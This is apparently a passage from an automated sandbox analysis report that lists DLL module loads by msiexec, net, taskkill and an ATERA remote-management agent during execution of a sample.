                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cabinet.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cabinet.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cabinet.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cabinet.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dllJump to behavior
                              Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dllJump to behavior
                              Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dllJump to behavior
                              Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: riched20.dllJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: usp10.dllJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: msls31.dllJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cryptnet.dllJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dhcpcsvc6.dllJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dhcpcsvc.dllJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: webio.dllJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: mscoree.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: kernel.appcore.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: version.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: windows.storage.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: wldp.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: profapi.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cryptsp.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rsaenh.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cryptbase.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: propsys.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: edputil.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: urlmon.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: iertutil.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: srvcli.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: netutils.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: windows.staterepositoryps.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: sspicli.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: wintypes.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: appresolver.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: bcp47langs.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: slc.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: userenv.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: sppc.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: onecorecommonproxystub.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: onecoreuapcommonproxystub.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rasapi32.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rasman.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rtutils.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: mswsock.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: winhttp.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: iphlpapi.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dhcpcsvc6.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dhcpcsvc.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: dnsapi.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: winnsi.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: rasadhlp.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: fwpuclnt.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: secur32.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: schannel.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: mskeyprotect.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ntasn1.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ncrypt.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: ncryptsslp.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: msasn1.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: gpapi.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: wbemcomn.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: amsi.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cryptnet.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: webio.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: cabinet.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: apphelp.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: mscoree.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: apphelp.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: kernel.appcore.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: version.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: cryptsp.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rsaenh.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: cryptbase.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: windows.storage.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: wldp.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: profapi.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: wbemcomn.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: amsi.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: userenv.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rasapi32.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rasman.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rtutils.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: mswsock.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: winhttp.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: iphlpapi.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: dhcpcsvc6.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: dhcpcsvc.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: dnsapi.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: winnsi.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rasadhlp.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: fwpuclnt.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: secur32.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: sspicli.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: schannel.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: mskeyprotect.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ntasn1.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ncrypt.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ncryptsslp.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: msasn1.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: gpapi.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: mscoree.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: kernel.appcore.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: version.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: cryptsp.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rsaenh.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: cryptbase.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: windows.storage.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: wldp.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: profapi.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: wbemcomn.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: amsi.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: userenv.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rasapi32.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rasman.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rtutils.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: mswsock.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: winhttp.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: iphlpapi.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: dhcpcsvc6.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: dhcpcsvc.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: dnsapi.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: winnsi.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rasadhlp.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: fwpuclnt.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: secur32.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: sspicli.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: schannel.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: mskeyprotect.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ntasn1.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ncrypt.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ncryptsslp.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: msasn1.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: gpapi.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: mscoree.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: kernel.appcore.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: version.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: cryptsp.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rsaenh.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: cryptbase.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: windows.storage.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: wldp.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: profapi.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: wbemcomn.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: amsi.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: userenv.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rasapi32.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rasman.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: rtutils.dll
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeSection loaded: mswsock.dll
